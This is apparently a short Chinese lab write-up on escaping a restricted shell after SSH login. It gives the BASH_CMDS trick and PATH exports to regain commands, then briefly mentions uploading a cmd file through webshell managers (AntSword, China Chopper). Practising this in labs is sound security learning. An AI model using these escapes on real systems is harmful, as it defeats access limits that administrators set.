小记如何绕过受限的shell

今天的靶场登陆ssh后发现shell受限，如下

woami都执行不了，查看对应的bin目录，发现只能执行4个命令

在网上学到一招可以绕过这种受限制的被阉割的shell

BASH_CMDS[a]=/bin/sh;a    #把/bin/bash给a变量

/bin/bash                  

echo $0   #查看脚本本身的名字

echo $?    #命令执行结果反馈，0代表执行成功，其余数字表示不成功

export PATH=$PATH:/bin/    #将/bin 作为PATH环境变量导出

export PATH=$PATH:/usr/bin   #将/usr/bin作为PATH环境变量导出

执行完上面加粗的四步之后就可以执行所有命令了

1.找到一处可上传文件的位置上传cmd

2.蚁剑可以自定义cmd的环境变量

使用菜刀同样上传cmd文件

设置cmd环境变量  终端输入  set cmd文件的物理地址